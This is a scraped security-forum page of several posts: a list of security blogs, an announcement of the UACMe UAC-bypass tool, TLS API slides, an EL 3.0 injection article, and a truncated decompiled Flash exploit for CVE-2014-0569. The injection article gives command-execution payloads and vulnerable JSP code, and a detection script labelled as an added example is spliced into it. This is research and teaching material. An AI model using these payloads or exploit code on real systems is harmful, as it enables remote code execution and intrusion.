[h=3]#29 Krebs On Security[/h] Brian Krebs is the face of cyber security journalism. As a former writer for the Washington Post, Krebs is able to bring his skills as an investigative journalist to the task and provide the most in-depth coverage of security.
[h=3]#30 Malwarebytes[/h] Malwarebytes is at the forefront of malware protection, which makes this the perfect blog to stay up-to-date with the latest zero day threats and cyber security news.
[h=3]#31 McAfee Security Blog[/h] The McAfee security blog talks about research and threat analysis, and provides knowledgeable insight into malware and zero day threats that plague businesses and consumers.
[h=3]#32 Microsoft Malware Protection Center[/h] The Microsoft Malware Protection Center (MMPC) is committed to helping Microsoft customers keep their computers secure. The MMPC stays agile to combat evolving threats.
[h=3]#32 Naked Security[/h] Naked Security is Sophos's award-winning threat news room, giving you news, opinion, advice and research on computer security issues and the latest internet threats.
[h=3]#33 Network Computing[/h] Network Computing's content adheres to the valuable "For IT, By IT" methodology, delivering timely strategy & tactics, news, in-depth features, expert reviews, and opinionated blogs.
[h=3]#34 SANS Institute AppSec Blog[/h] SANS Software Security focuses the deep resources of SANS on the growing threats to the application layer by providing training, certification, research, and community initiatives.
[h=3]#35 SC Magazine[/h] SC Magazine arms information security professionals with the in-depth, unbiased business and technical information they need to tackle the countless security challenges they face.
[h=3]#36 Search Security[/h] Search Security provides immediate access to breaking industry news, virus alerts, new hacker threats and attacks, security and certification training resources.
[h=3]#37 Securing The Human[/h] SANS is the most trusted and by far the largest source for information security training and security certification in the world, which makes their blog a must read for security professionals. [h=3]#38 Security Watch[/h] Neil Rubenking heads the charge on PC Mag’s Security Watch. His style is witty and he post frequently, so you’ll always find something worthwhile to read. [h=3]#39 Stop Badware Blog[/h] StopBadware is a nonprofit anti-malware organization whose work makes the Web safer through the prevention, mitigation, and remediation of badware websites. [h=3]#40 Sucuri Blog[/h] Sucuri knows all about malware and WordPress security. It’s what they do. You’ll find no shortage of expert advise on how to secure your WordPress site and keep it malware-free. [h=3]#41 TaoSecurity[/h] Richard Bejtlich’s blog on digital security, concentrating on global challenges posed by China and other targeted adversaries. Definitely a blog that has been a fixture in the security community. [h=3]#42 Techworld Security[/h] The cyber security section on Techworld.com covers news on the latest threats and zero-day exploits. They also offer an abundance of topics ranging from security to how-tos, as well as, technology reviews. [h=3]#43 The Honeynet Project[/h] The Honeynet Project members engage the broader security community and educate the public about threats to systems and information. [h=3]#44 Threatpost[/h] Threatpost, The Kaspersky Lab security news service, is an independent news site which is a leading source of information about IT and business security for hundreds of thousands of professionals worldwide. [h=3]#45 Threat Track Security[/h] Threat Track Security’s IT blog has its thumb on the pulse of the industry. Whether you are in the IT industry or not, if you are interested in security, this blog is for you. 
[h=3]#46 Trend Micro Simply Security[/h] Trend Micro Simply Security offers independent news and views as well as expert insight from Trend’s security experts. The site covers topics ranging from cloud security, data protection, security and privacy. [h=3]#47 Veracode Blog[/h] Veracode Security Blog: Application security research, security trends and opinions. Everything you want to know about if you work in infosec or online. [h=3]#48 Unmask Parasites Blog[/h] Unmask Parasites focuses on reviewing the latest security threats, zero days, and exploits. There is everything from security-related news, to information on keeping your site secure and malware-free. [h=3]#49 We Live Security[/h] We Live Security is a site about research and information, not products. We Live Security’s writers represent the cream of ESET’s researchers and writers. They deliver in-depth research and analysis on security. [h=3]#50 Xylibox Security Blog[/h] Tracking and demystifying cybercrime is what happens here. The author never fails to produce consistent, detailed breakdowns of the latest malware and security tools. [h=2]PR5[/h] [h=3]#51 BankInfoSecurity[/h] BankInfoSecurity is a multi-media website published by Information Security Media Group, Corp. (ISMG), a company specializing in coverage of information security, risk management, privacy and fraud. [h=3]#52 Cyveillance Blog[/h] From sophisticated DDoS botnet attacks to phishing, the Cyveillance blog will keep you up-to-date with breaking cyber security news and information on everything related to web threats, malware and security. [h=3]#53 Forbe’s Firewall[/h] Forbe’s Firewall covers cyber security news and information on the latest exploits and trends affecting the industry. The articles are on point and informative, with the quality you can expect from Forbes. [h=3]#54 GovInfoSecurity[/h] GovInfoSecurity is a multi-media website published by Information Security Media Group, Corp. 
(ISMG), a company specializing in coverage of information security, risk management, privacy and fraud. [h=3]#55 Graham Cluley’s Security Blog[/h] Graham Cluley is an award winning cyber security blogger and independent computer security analyst. His blog reflects his knowledge and experience in the industry. [h=3]#56 GRC’s Security Now Podcast[/h] Security Now is a weekly podcast hosted by Steve Gibson and Leo Laporte. The show is sponsored by Gibson Research Corporation, a company specializing in data recovery and security. [h=3]#57 HotforSecurity[/h] This blog covers the sizzling world of computer security. You’ll find plenty of steamy stories from the dynamic world of internet fraud, scams, and malware. [h=3]#58 Imperva Blog[/h] From analyst reports to case studies, to blog posts and white papers, the Imperva blog keeps step with the latest malware and security threats. You’ll find information on DDoS, malware, and zero day threats. [h=3]#59 IT Knowledge Exchange – Security Bytes[/h] Written by the staff of SearchSecurity.com and Information Security magazine, Security Bytes covers topics across the spectrum of security, privacy and compliance. [h=3]#60 ItProPortal.com[/h] ITProPortal.com was one of the very first technology websites to launch in the UK back in 1999 and has grown to become one of the UK’s leading and most respected technology information resources. [h=3]#61 Lenny Zeltser On Information Security[/h] This blog by Lenny Zeltser focuses on information security. Lenny is a business and tech leader with extensive hands-on experience in IT and information security. [h=3]#62 Network Security Blog with Martin McKeay[/h] One man’s views on security, privacy – and anything else for that matter. Trends, information, news: you’ll find it all on the Network Security blog, and what’s more is it’s delivered with style. [h=3]#63 PandaLabs Cyber Security Blog[/h] This blog covers everything you need to know about internet threats. 
The PandaLabs blog keeps you abreast of the latest developments in cyber security. [h=3]#64 PaulDotCom[/h] PaulDotCom Security weekly’s mission is to provide free content within the subject matter of IT security news, vulnerabilities, hacking, and research. [h=3]#65 Privacy & Information Security Law Blog[/h] The views of one man on security, privacy and anything else that catches his attention. Security expert Martin McKeay talks about malware, privacy and security on this blog. [h=3]#66 Rational Survivability[/h] Hoff’s ramblings about information survivability, information centricity, risk management and disruptive innovation. Hoff was a CISSP, CISA, CISM and NSA IAM, he now spends the AMF money on coffee. [h=3]#67 Risky Business[/h] Risky.biz is another security podcast that focuses on covering recent developments in cyber security and the threat landscape. The show has been around since 2007, and takes a light approach to security news. [h=3]#68 Root Labs RDIST[/h] Their research provides cutting-edge insight into solving tough security problems. There are countless articles on the latest cyber security trends and threats. [h=3]#69 Seculert Blog[/h] The Seculert blog is a security blog with a focus on Advanced Persistent Threats and malware. There is no shortage of network security tips and insider information on the latest zero days. [h=3]#70 Security Street by Rapid7[/h] Rapid7 provides vulnerability management, compliance and penetration testing solutions for web applications, network and database security. Their community, Security Street covers all of these issues. [h=3]#71 Securosis Blog[/h] Securosis is the world’s leading independent security research and advisory firm, offering unparalleled insight and unique value to meet the challenges of managing security and compliance in a Web 2.0 world. [h=3]#72 SilverSky Altitude Blog[/h] SilverSky is a cloud security services provider with a lot of knowledge in the industry. 
Their blog, the Altitude blog, is updated regularly with news and information every security professional should be aware of. [h=3]#73 SpiderLabs Security Blog[/h] SpiderLabs is an elite team of ethical hackers, investigators and researchers at Trustwave advancing the security capabilities of leading businesses and organizations throughout the world. The site covers the latest security news. [h=3]#74 Social-Engineering.org[/h] Social-Engineering.org is a cyber security blog that covers a wide range of security related topics. The site is also home to a podcast and a team of security professionals who share their expertise on all things security. [h=3]#75 The Security Skeptic[/h] The Security Skeptic blogs about all matters related to Internet Security, from domain names (DNS), firewalls and network security to phishing, malware and social engineering. [h=3]#76 Thought Crime Cyber Security Blog[/h] Moxie Marlinspike’s blog covers computer security and software development, particularly in the areas of secure protocols, cryptography, privacy, and anonymity. [h=3]#77 Troy Hunt’s Blog[/h] Software architect and Microsoft MVP, you’ll find Troy Hunt writing about security concepts and process improvement in software delivery. The quality of content found here makes this blog worth visiting. [h=2]PR4[/h] [h=3]#78 1 Raindrop[/h] Gunnar Peterson weaves his thoughts on distributed systems, security, and software together on his blog 1 Raindrop. The blog is both informative and insightful, and the coverage is on point. [h=3]#79 Andrew Hay’s Cyber Security Blog[/h] Andrew Hay is the Director of Applied Security Research and Chief Evangelist at CloudPassage, Inc. This is his personal blog where he talks about security and other news. [h=3]#80 Carnal Ownage[/h] Carnal Ownage is a must stop for security researchers and hackers alike. This cyber security blog goes into excruciating detail on attack methodology and highlights the threats your organization should be aware of. 
[h=3]#81 Command Line Kung Fu[/h] This blog covers fun, useful, interesting, security related (and non-security related) tips and tricks associated with the command line. Find tips on OS X, Linux and Windows. [h=3]#82 Dancho Danchev’s Blog[/h] This blog covers trends and fads, tactics and strategies, intersecting with third-party research, speculations and real-time CYBERINT assessments, all packed with sarcastic attitude. [h=3]#83 Darknet[/h] Don’t Learn to HACK – Hack to LEARN. That’s the motto at Darknet. The site covers ethical hacking, penetration testing, and computer security. Learn about interesting infosec related news, tools and more. [h=3]#84 Errata Security[/h] Errata Security is a team of dedicated security researchers that practice offensive security. The insight gained from research is delivered on the blog, which covers a variety of topics and real world scenarios. [h=3]#85 Exotic Liability[/h] Chris Nickerson and Ryan Jones take it up a notch in their cyber security podcast. They routinely thumb their nose at the typical industry rhetoric and offer insight and commentary you won’t hear anywhere else. [h=3]#86 Hack Surfer[/h] HackSurfer was formed by a group of businessmen and women, engineers, mathematicians, linguists and information analysts with a passion for making simple, powerful use of big data. [h=3]#87 InfoSec Institute Resources[/h] The InfoSec Institute resources section has a broad selection of content and research on cyber security, threats, and of course, infosec. You’ll also find tutorials, training videos and more. [h=3]#88 J4vv4D Security Blog[/h] Javvad Malik has worked in information security for his entire career and covers different aspects of security on his blog, J4vv4D. He also regularly offers his insight through entertaining and informative YouTube videos. 
[h=3]#89 Liquid Matrix[/h] In a world that seems to be losing the notion of journalism, Liquidmatrix Security Digest remains committed to long form articles that dig into the major issues affecting the industry with Feature articles. [h=3]#90 Malcovery Security Blog[/h] This is Malcovery Security’s contribution to the knowledgebase of information security issues. They provide relevant insight and opinions on all of the newest threats faced by the industry. [h=3]#91 Malware Don’t Need Coffee[/h] Malware Don’t Need Coffee is a cyber security blog that focuses on malware research and provides educated commentary on all the latest exploits and security bugs. The site covers research in all areas of network security. [h=3]#92 McGrew Security Blog[/h] Wesley McGrew understands security and the nature of today’s digital landscape, especially its impact on infrastructure and business security. His blog covers all of the important cyber security stuff. [h=3]#93 Network Security Podcast[/h] Since 2007, the Network Security Podcast has been dishing out the dirt on cyber threats and security issues faced by the industry. It’s a great resource if you want to hear a discussion on what’s happening in infosec. [h=3]#94 New School Security[/h] This blog is inspired by the book and the movement towards a New School. The New School of Information Security is a book by Adam Shostack and Andrew Stewart, published in 2008. [h=3]#95 NoVA Infosec[/h] Founded in January of 2008 on a Saturday evening, NovaInfosec.com is dedicated to the community of Northern Virginia-, Washington, DC-, and southern Maryland-based security professionals. [h=3]#96 Packet Pushers Podcast[/h] The Packet Pushers Podcast offers deeply technical, hardcore discussions on the latest security trends. Co-hosts Greg Ferro and Ethan Banks lead the show with their many years of network engineering. 
[h=3]#97 Security Affairs[/h] Pierluigi Paganini is a company director, researcher, security evangelist, security analyst and freelance writer. His blog Security Affairs stays abreast of all the latest in cyber security. [h=3]#98 Security Bistro[/h] Security Bistro is where security experts come together for good talk, information on the latest ingenious threats and, one hopes, the latest clever ways to counter them. [h=3]#99 Security Geeks[/h] Find tips on computer security, choosing a password properly, and other practical online security tips. No shortage of interesting content circling the technology space here. [h=3]#100 Security Musings[/h] Gemini Security Solutions, Inc. is an information security consulting firm that applies creativity, passion, and insight to defend against today’s growing threats. Their blog, Security Musings, covers everything security. [h=3]#101 Security Uncorked[/h] Jennifer (Jabbusch) Minella aka JJ is a network security engineer and consultant with 15 years of experience. She shares her knowledge on infosec on her blog and offers plenty of information on the latest security trends. [h=3]#102 S!Ri.URZ[/h] This blog has been on the cyber security scene since as far back as 2006. The blog covers malware, rogues, ransomware and everything else related to cyber security. [h=3]#103 The AShimmy Blog[/h] StillSecureAfterAllTheseYears.com (yes, a really long domain!) is the AShimmy Blog, Alan Shimel’s personal blogger blog on security, work, and family life. [h=3]#104 The Falcon’s View[/h] Ben Tomhave is a security professional that has served the industry in a variety of roles and security positions. This is reflected in his writing and the knowledge shared on his cyber security blog. [h=3]#105 The Harmony Guy[/h] You’ll find links and commentary related mostly to online privacy and security, particularly with social networking. The blog started back in 2007 and has been going ever since. 
[h=3]#106 The Southern Fried Security Podcast[/h] The SFS Podcast is designed to be an information security podcast that fills the gap between technical security podcasts and Security Now. This podcast offers respectful insight on the state of security. [h=3]#107 Uncommon Sense Security[/h] Small business information security has been an oxymoron for too long. Uncommon Sense Security is attempting to change that. The blog is entertaining, and informative at the same time. [h=2]PR3[/h] [h=3]#108 Andy Ellis — Protecting A Better Internet[/h] Andy Ellis is the Chief Security Officer of Akamai Technologies. Opinions here are mostly his own. His blog dives into the issues centered around cyber security and technology. [h=3]#109 DHS Daily Report[/h] A U.S. Army Retired Chief Warrant Officer with more than 40 years in information technology and 35 years in information security leads the charge on this blog, offering daily news on the industry. [h=3]#110 IT Security Expert by Dave Whitelegg[/h] The UK based IT Security Expert blog by Dave Whitelegg CISSP CCSP providing general Information Security advice & help in securing the home PC & home computer user, as well as business IT systems. [h=3]#111 IT Specialist[/h] A virtual community of social networks for IT professionals located throughout the world. A great way to connect and collaborate with others in the cyber security industry. [h=3]#112 MichaelPeters.org[/h] Michael D. Peters has been an independent information security consultant, executive, researcher, author, and catalyst with many years of information technology and shares that information on his site. [h=3]#113 Rivalhost Security Blog[/h] Rivalhost is a DDOS mitigation company and web host that takes an active stance on updating their customers and community with a mix of topics on technology, cyber security, and DDOS. [h=3]#114 Rud.is Security Blog[/h] This is a place to catch some opines on a pretty weird combination of topics. 
You’ll likely see topics ranging from IT/Information Risk Management to iOS, Node.js, and everything in-between. [h=3]#115 Security Xploded Blog[/h] SecurityXploded – the community division of XenArmor – is a popular Infosec Research & Development organization offering free security software, latest research articles and free cyber security training. [h=3]#116 Thom Langford’s Personal Security Blog[/h] An information security professional, award winning blogger, and industry commentator. Thom Langford talks about topics relating to information security, risk management and compliance. [h=3]#117 W. Mark Brooks IT Security Blog[/h] On his cyber security blog Brooks talks about mitigating risks and business strategies as they relate to IT. There is never a dull post and the author finds plenty of interesting security topics to dissect. [h=2]PR2[/h] [h=3]#118 Ethical Hacking[/h] Ehacking.net explores ethical hacking, penetration testing, and hacking. You’ll also find a wealth of tutorials on BackTrack and other penetration testing tips. An ideal site for information security researchers. [h=3]#119 IT Security Column[/h] An IT security blog that features general knowledge of IT security, online crime news, and tips on how to deal with online and computer threats. Plus, listings of information security threats and defenses. [h=3]#120 Kevin Townsend’s Cyber Security Blog[/h] This site is about computer and information security. It is maintained by Kevin Townsend, the original founder of ITsecurity.com and a freelance journalist and writer with more than 10 years experience. [h=3]#121 Psilva’s Prophecies[/h] Peter Silva covers security for F5 Networks Technical Marketing Team. With his theatre background and knowledge of security his blog makes for an interesting pit stop for security news. [h=3]#122 Websense Security Labs[/h] Websense Security Labs does a great job of sharing information and insight on the latest cyber security news. Their blog has been around since ’07. 
There is plenty of material to dig through for research. [h=2]PR1[/h] [h=3]#123 DDoS Protection & Cyber Security Blog[/h] A blog that centers around the threat posed by distributed denial of service (DDoS) attacks. You’ll find a news section that offers a snapshot of the latest security trends, as well as, epic posts highlighting the industry. [h=3]#124 Dave Waterson on Security[/h] Dave Waterson is an experienced IT security technologist, inventor of patented and patent-pending security technology in the anti-key logging and anti-phishing fields. [h=3]#125 Following The Wh1t3 Rabbit[/h] Rafal Los has been working in the defensive side of security for over 10 years. His blog, Following The Wh1t3 Rabbit, focuses on clearing the confusion around security and offering tools to improve security. [h=2]PR0[/h] [h=3]#126 FireEye Blog[/h] FireEye has invented a purpose-built, virtual machine-based security platform that provides real-time threat protection. FireEye has been called a “hot security firm” — their blog backs that up. [h=3]#127 How They Hack[/h] HowTheyHack is a general tech blog surrounding themes related to hacking and network security. Most of the posts are centered around tutorials, hacking news, security exploits and the author’s opinions. [h=3]#128 Technology.info[/h] Technology.info combines the best of ITProPortal.com and IP EXPO, offering a resource for IT professionals and those interested in security. The site boasts a wide variety of information security research and topics. Sursa: Top 100+ Cyber Security Blogs & Infosec Resources
  17. UACMe - Defeating Windows User Account Control by EP_X0FF » Fri Dec 19, 2014 8:19 am Inspired by ITW WinNT/Pitou legacy MBR x86-64 bootkit dropper. Before anything else read this excellent work -> Windows 7 UAC whitelist, read it carefully as it explains everything especially why Windows User Account Control is a big fucken marketing joke from Microsoft just like DSE. Below is our variant of his work with removal of all C++ trash and adapting different UAC bypass method from WinNT/Pitou (bootkit authors also used as base Leo Davidson work). The only setting UAC somehow is able to show itself - if they are set on maximum. But here revealed another Microsoft UAC architecture flaw by design - even when it blocks something, it cannot properly determine what it blocked, representing possible malicious actions as taken by Microsoft, facepalm. Will you trust verified Microsoft action with verified digital certificate from Microsoft? Supported Windows version, all from 7xxx builds up to latest so "confidential" MS build 9901. Project overview: Win32 and x64 configurations. Compiled in MSVS 2013 U4, used pure C, compiled as C++. No additional dependencies. All libs in attach. Debug builds configurations present only for debugging stuff not for UAC bypass stage execution (shellcode will be screwed up). Require Heavens Gate adaptation for proper work from Win32 app under WOW64, if you don't know what is HG then skip this moment. x64 loader VT https://www.virustotal.com/en/file/78caa8fa31a802547b160f41c03fd825d01d1edcd064e06984d0cf84a3bc7813/analysis/1418968668/ x86-32 loader VT https://www.virustotal.com/en/file/97952e6bb9cb4b3c43215597be0bb1da504d2066fd1717c20d6fd64917311c06/analysis/1418968812/ Screenshots taken from Windows 10 TP build 9901: uac101.png (325.47 KiB), uac102.png (215.73 KiB). Attachments: UACME.rar, pass: uacme (498.9 KiB). Sursa: KernelMode.info • View topic - UACMe - Defeating Windows User Account Control
  18. Java's SSLSocket: How Bad APIs Compromise Security. Tale of a Frustrated Android Developer. Dr. Georg Lukas <lukas@rt-solutions.de>. A brief history of SSL/TLS; Java TLS APIs: All-or-nothing security; Making your (Android) application more secure; TLS in the Post-Snowden Era. Download: https://deepsec.net/docs/Slides/2014/Java%27s_SSLSocket_-_How_Bad_APIs_Compromise_Security_-_Georg_Lukas.pdf
  19. [h=3]EL 3.0/Lambda Injection: Hacker Friendly Java[/h]The following article explains the mechanics of a code injection attack called EL3 Injection in applications that make use of the relatively new EL3 processor in Java. New mechanics and operators introduced in EL3 make the discovery and exploitation of this exposure almost as easy and seamless as SQL Injection, and the impact of the vulnerability is severe, with potential impacts such as denial of service, information theft and even remote code execution. Since the EL3 technology is relatively new it's probably not (YET) as common as other severe exposures, but at the very least, it will put a big wide THEY DID WHAAAAT!? smile on your face. [Note – The following article discusses a generic application-level coding flaw in modern Java applications, NOT a Java 0-day. Keep on reading – the juicier RCE payloads are presented at the end] While trying (and miserably failing) to create a training kit for EL Injection (or Spring EL Injection, JSR245, if you will), published by Stefano Di Paola and Arshan Dabirsiaghi, I spent some time trying to get a working build of the Eclipse-based STS IDE version which supported the vulnerable Java Spring MVC versions (Spring 3.0.0-3.0.5). Turns out that someone did a REALLY GOOD job eradicating every trace of the vulnerable builds, leaving only the time-consuming option of compiling the environment from scratch. Luckily, at some point, I decided to take a short break and read about the relatively new EL in Java (JSR341, not necessarily in Java Spring) – and found something VERY interesting. Turns out that the newest Java Expression Language version, EL 3.0 (published sometime in 2013), includes multiple enhancements, such as operators, security restrictions on class access, and so on. 
A typical source code sample of using EL3 in a Servlet or JSP page would look something like:
[TABLE=align: left]
[TR]
[TD]
<%@page import="javax.el.ELProcessor"%>
…
<%
ELProcessor elp = new ELProcessor();
// EL 3.0 concatenates strings with +=; the + operator coerces both operands to numbers
Object msg = elp.eval("'Welcome' += user.name");
out.println(msg.toString());
%>
[/TD]
[/TR]
[/TABLE]
The ELProcessor dynamically evaluates the EL statement and attempts to access the "name" field of the bean (or registered class) user. After taking a couple of shots at "guessing" objects that might be accessible by default, I stumbled on one of the features that can be used to define access to classes in EL3: the ELManager class methods importClass, importPackage and importStatic. These methods can be used to "import" various classes and even packages into the scope of the expression language, so they can be referenced within expressions. So in order to use classes in EL3 expressions, you'll need to include them using statements such as:
[TABLE=align: left]
[TR]
[TD]
elp.getELManager().importClass("java.io.File");
[/TD]
[/TR]
[/TABLE]
This feature was implemented due to safety concerns (or in other words, security), to make sure that access to classes is presumably prevented for any class that was not also included in the page/project original EL imports AND application imports, so that even if developers enable user input to affect the "importPackage" or "importClass" statements, the external effect will be limited to the classes already imported in the context. 
However, since many interesting classes and packages are typically used in Servlets and JSP pages, an attacker can still abuse this feature in multiple scenarios:
(1) If the developer already imported a class that the attacker needs into the EL context, and attacker-controlled input is used within the expression evaluation:
[TABLE=align: left]
[TR]
[TD]
Input1 = "File.listRoots()[0].getAbsolutePath()"
[/TD]
[/TR]
[TR]
[TD]
<%@page import="javax.el.ELProcessor"%>
<%@page import="javax.el.ELManager"%>
…
<%
String input1 = request.getParameter("input1");
ELProcessor elp = new ELProcessor();
elp.getELManager().importClass("java.io.File");
Object path = elp.eval(input1);   // request parameter evaluated as EL
out.println(path);
%>
[/TD]
[/TR]
[/TABLE]
(2) If the developer enabled the user to control the importClass/Package statement (no limits to human stupidity, right?), and already has a wide enough scope imported in the page/application imports:
[TABLE=align: left]
[TR]
[TD]
Input1 = "File.listRoots()[0].listFiles()[1].getAbsolutePath()"
Input2 = "java.io.File"
[/TD]
[/TR]
[TR]
[TD]
<%@page import="javax.el.ELProcessor"%>
<%@page import="javax.el.ELManager"%>
…
<%
String input1 = request.getParameter("input1");
String input2 = request.getParameter("input2");
ELProcessor elp = new ELProcessor();
elp.getELManager().importClass(input2);   // request parameter controls the import
Object path = elp.eval(input1);
out.println(path);
%>
[/TD]
[/TR]
[/TABLE]
So, here you go. A nice exploit that will probably affect a couple of desolate apps with super insecure code. Hardly worth its own classification. However, while trying to squeeze some more juice out of the potential attack vector, I stumbled upon the following, which explains the features of EL3 in great detail. To make a long story short, watch the video and skip to 7:52. It's well worth your time. 
Turns out that despite the security restrictions that required developers to explicitly import classes and packages to be used in the EL3 scripts, the java.lang package was included by default, to enable the typical developer to gain access to static type objects and methods such as Boolean.TRUE and Integer.numberOfTrailingZeros. They enabled access by default to the static members of classes in JAVA.LANG, as in the java.lang package that includes java.lang.System and java.lang.Runtime! JAVA.LANG! Seems like somebody there confused "user friendly" with "hacker friendly" :) So, if for some reason a user controlled input would stumble into an EL3 eval clause, which for some reason Java is encouraging users to use in many platforms such as JSF, CDI, Avatar and many CMSs, then attackers could do a LOT more with no requirements on specific imports:

Input1 = "System.getProperties()"

<%@page import="javax.el.ELProcessor"%>
<%@page import="javax.el.ELManager"%>
…
<%
String input1 = request.getParameter("input1");
ELProcessor elp = new ELProcessor();
Object sys = elp.eval(input1);
out.println(sys);
%>

Also, instead of using the System class, we can use the Runtime static class methods to execute shell commands. For example:

Input1 = "Runtime.getRuntime().exec('mkdir abcde').waitFor()"

<%@page import="javax.el.ELProcessor"%>
<%@page import="javax.el.ELManager"%>
…
<%
String input1 = request.getParameter("input1");
ELProcessor elp = new ELProcessor();
Object sys = elp.eval(input1);
out.println(sys);
%>

An impact similar to that of Spring's counterpart of EL injection, only in mainstream Java. Cool. Now we can shamelessly classify the attack and rest. But there's more!
Although scenarios in which the user's input will get full control of the entire EL string are possible, they are much less common than scenarios in which user input might be integrated as a part of an EL string, in which case most of the previously mentioned payloads won't work. However, EL 3.0 was kind enough to present us with NEW operators, one of which is the infamous semicolon (;). As its SQL counterpart's functionality suggests, the semicolon delimiter can be used in EL 3 to close one expression, and add additional expressions, with or without logical relations to each other. Think adding multiple lines of code to a single attack payload. Think injecting payloads into the middle of an expression, while using techniques similar to blind SQL injection. Don't think. Here's a couple of examples:

Input1 = "; Runtime.getRuntime().exec('mkdir aaaaa12').waitFor()"

<%@page import="javax.el.ELProcessor"%>
<%@page import="javax.el.ELManager"%>
…
<%
String input1 = request.getParameter("input1");
ELProcessor elp = new ELProcessor();
Object sys = elp.eval("'Welcome' + " + input1);
out.println(sys);
%>

Input1 = "1); Runtime.getRuntime().exec('mkdir jjjbc12').waitFor("

<%@page import="javax.el.ELProcessor"%>
<%@page import="javax.el.ELManager"%>
…
<%
String input1 = request.getParameter("input1");
ELProcessor elp = new ELProcessor();
Object sys = elp.eval("SomeClass.StaticMethod(" + input1 + ")");
out.println(sys);
%>

So due to the implementation of the semicolon operator, potential injections can now CLOSE PREVIOUS STATEMENTS and start new statements, making the potential injection almost as usable as SQL injection. Features such as EL variable declaration, value assignments and others (watch the video) just add more fuel to the fire. So much for enhanced security features.
We already identified a few instances that affect real world applications (no instances in core products, so far), and are currently handling them in front of the relevant entities. I'll probably invest some more time in the upcoming weeks to see if any prominent Java projects are prone to this issue, but in the meantime, some practical notes: Regardless of how common these issues are, these potential exposures could easily be identified in code reviews or by source code analysis tools that track the effect of input on the various methods of the ELProcessor class, and on similar EL related classes. Generic blind injection payloads can be added as plugins for automated scanners, and we could go bug hunting to see if any more of these potential issues exist in the wild. The mitigation is also simple: not embedding input into EL statements, and validating input in case you do. I'll update this post as the research progresses. Cheers

Posted by Shay Chen at 4:13 AM

Sursa: Security Tools Benchmarking: EL 3.0/Lambda Injection: Hacker Friendly Java
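As a starting point for the code-review / source-analysis check the post recommends, here is an added Python example (not code from the post or its author): a small taint tracker that flags values read from request.getParameter() when they reach ELProcessor.eval() or the ELManager importClass/importPackage/importStatic calls, following one level of assignment. The two JSP snippets it scans are constructed; the "safe" one binds the input as a bean value with ELProcessor.defineBean() and uses the EL 3.0 string concatenation operator `+=` in a constant expression, both of which are assumptions about the javax.el API that the post itself does not show.

```python
"""Toy source checker for EL injection sinks in JSP/Java scriptlets (added example).

It recognises only the pattern described in the post: a variable filled from
request.getParameter() that later reaches ELProcessor.eval() or an ELManager
import* call, possibly through one plain assignment or concatenation.
"""
import re
from typing import List, Set, Tuple

# A variable assigned from request.getParameter(...) becomes tainted.
SOURCE_RE = re.compile(r'\b(\w+)\s*=\s*request\.getParameter\s*\(')
# Plain assignment: the left side is tainted if the right side mentions a tainted name.
ASSIGN_RE = re.compile(r'\b(\w+)\s*=(?!=)\s*(.+?);')
# Methods whose argument is evaluated as EL or widens what EL can reach.
SINK_RE = re.compile(r'\.(eval|importClass|importPackage|importStatic|setVariable)\s*\((.*)')
# Java string literals are blanked so a name inside quotes is not taken for a variable.
LITERAL_RE = re.compile(r'"(?:\\.|[^"\\])*"')

Finding = Tuple[int, str, str]  # (line number, sink method, tainted variable)


def _mentions(name: str, text: str) -> bool:
    return re.search(rf'\b{re.escape(name)}\b', text) is not None


def find_el_taint(source: str) -> List[Finding]:
    """Return (line, sink, variable) for every tainted variable that reaches an EL sink."""
    tainted: Set[str] = set()
    findings: List[Finding] = []
    for lineno, line in enumerate(source.splitlines(), 1):
        code = LITERAL_RE.sub('""', line)
        src = SOURCE_RE.search(code)
        if src:
            tainted.add(src.group(1))
            continue
        assign = ASSIGN_RE.search(code)
        if assign and any(_mentions(v, assign.group(2)) for v in tainted):
            tainted.add(assign.group(1))
        for sink, arg in SINK_RE.findall(code):
            for var in sorted(tainted):
                if _mentions(var, arg):
                    findings.append((lineno, sink, var))
    return findings


# Constructed sample mirroring the post's scenario (2): both inputs reach EL sinks.
VULNERABLE_JSP = "\n".join([
    '<%@page import="javax.el.ELProcessor"%>',
    '<%',
    'String input1 = request.getParameter("input1");',
    'String input2 = request.getParameter("input2");',
    'ELProcessor elp = new ELProcessor();',
    'elp.getELManager().importClass(input2);',
    'Object path = elp.eval(input1);',
    'out.println(path);',
    '%>',
])

# Constructed hardened variant: the input is bound as data, the EL text stays constant.
SAFE_JSP = "\n".join([
    '<%@page import="javax.el.ELProcessor"%>',
    '<%',
    'String input1 = request.getParameter("input1");',
    'ELProcessor elp = new ELProcessor();',
    'elp.defineBean("name", input1);',            # assumed javax.el API
    'Object msg = elp.eval("\'Welcome \' += name");',  # constant expression
    'out.println(msg);',
    '%>',
])


if __name__ == "__main__":
    for label, src in (("vulnerable", VULNERABLE_JSP), ("safe", SAFE_JSP)):
        print(label, find_el_taint(src))
```

The checker is deliberately line-based and will miss taint that crosses method boundaries or goes through collections; it is meant to show the shape of the rule a real static-analysis plugin would carry, not to replace one.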
  20. [h=1]Exploit.SWF.CVE-2014-0569 Decoded Code[/h]By: physicaldrive0 on Dec 18th, 2014 [LIST=1]package { import flash.events.*; import flash.media.*; import flash.display.*; import flash.geom.*; import flash.utils.*; import flash.text.*; import flash.external.*; import flash.system.*; import flash.net.*; import __AS3__.vec.*; import avm2.intrinsics.memory.*; public class aeryk extends Sprite { private var mort5:Number; private var slotl:uint; private var larkr:uint = 233495534; private var crux1:uint = 200203949; private var whys3a:uint = 0x0800; private var orlyfx:Vector.<Object>; private var bios2t:Vector.<Object>; private var vola1:Sound; private var pokeg:ByteArray; private var magif:Vector.<Object>; private var rant2p:uint = 0; private var fray6u:Vector.<uint>; private var hugh1:uint; private var rugau8:uint; private var bonom:uint; private var gleeuo:uint; private var wombu3:uint; private var talis0:uint; private var dawnod:uint; private var fund2:uint; private var jump4:uint; private var dipseu:uint; private var buttkk:uint; private var modsj:uint; private var sobsft:uint; public function aeryk(){ var _loc2_ = 0; this.orlyfx = new Vector.<Object>(this.whys3a); this.bios2t = new Vector.<Object>(this.whys3a); this.magif = new Vector.<Object>(this.whys3a); super(); var _loc1_ = this.loaderInfo.parameters.kosoz; if ((((_loc1_ == null)) || (!(this.pawn2c(116, 150))))){ return; }; this.vola1 = new Sound(); this.pokeg = new ByteArray(); this.pokeg.endian = Endian.LITTLE_ENDIAN; this.pokeg.length = 65536; this.birdzu(); try { this.want2d(_loc1_); } catch(error:Error) { return; }; this.pisa8(); try { var _local2 = this.manei(); _loc2_ = _local2; if (_local2 != 0){ this.quodo0(); return; }; this.textline(1, "point4.5"); _local2 = this.grity(); _loc2_ = _local2; if (_local2 != 0){ this.textline(1, "premature exit, 4.5"); this.quodo0(); return; }; if (!(this.midin())){ this.quodo0(); return; }; if (!(this.weilwk())){ 